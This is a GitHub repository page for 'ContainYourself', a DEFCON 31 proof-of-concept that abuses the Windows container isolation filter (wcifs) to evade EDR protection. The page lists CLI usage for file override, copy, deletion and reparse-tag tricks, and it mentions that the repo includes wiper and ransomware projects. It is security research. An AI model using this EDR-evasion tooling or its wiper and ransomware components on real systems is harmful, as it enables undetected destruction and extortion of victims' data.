Skip to content

A PoC of the ContainYourself research presented in DEFCON 31, which abuses the Windows containers framework to bypass EDRs.

Notifications You must be signed in to change notification settings

deepinstinct/ContainYourself

Folders and files

NameName
Last commit message
Last commit date

Latest commit

5bea245 · Aug 31, 2023

History

10 Commits
Jul 12, 2023
Jul 13, 2023
Jul 12, 2023
Jul 13, 2023
Jul 12, 2023
Jul 12, 2023
Jul 12, 2023
Aug 24, 2023
Jul 12, 2023
Aug 31, 2023

Repository files navigation

ContainYourself

A PoC of the ContainYourself research, presented on DEFCON 31. This tool abuses the Windows containers framework to bypass EDR file-system-based malware protection, file write restrictions, and ETW-based correlations.

This repo contains a static library that implements the research findings, a PoC tool that utilizes the library, and a wiper & ransomware projects.

https://www.deepinstinct.com/blog/contain-yourself-staying-undetected-using-the-windows-container-isolation-framework

Installation

Make sure to clone the repository and its submodules:

git clone --recursive git@github.com:deepinstinct/ContainYourself.git

Usage

Usage: ContainYourselfPoc.exe [--command]

Valid commands:
        --set-reparse [override|link] - Set wcifs reparse tag
        --remove-reparse [override|link] - Remove wcifs reparse tag
        --override-file - override a file using wcifs
        --copy-file - Copy a file using wcifs
        --delete-file - Delete a file using wcifs
        --create-process - Create process from an image file path using NtCreateUserProcess
Commands arguments:
        --source-file  - operation full source file (relative to volume only when using with [--copy-file])
        --target-file  - operation target file (relative to volume)
        --source-volume  - operation source volume, without a trailing backslash (default is C:)
        --target-volume  - operation target volume, without a trailing backslash (default is C:)

Examples:
        ContainYourselfPoc.exe --set-reparse override --source-file C:\temp\calc.exe --target-file \temp\malware.exe
        ContainYourselfPoc.exe --remove-reparse --source-file C:\temp\calc.exe
        ContainYourselfPoc.exe --override-file --source-file C:\temp\calc.exe
        ContainYourselfPoc.exe --copy-file --source-file temp\document.docx --target-file Documents\document.docx --target-volume E:
        ContainYourselfPoc.exe --delete-file --source-file C:\temp\document.docx

Disclaimer

Every security product has the capability to incorporate its unique algorithm designed to counter ransomware and wiper threats. It cannot be guaranteed that this proof-of-concept will successfully circumvent every existing protection solution available.

Credits

About

A PoC of the ContainYourself research presented in DEFCON 31, which abuses the Windows containers framework to bypass EDRs.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published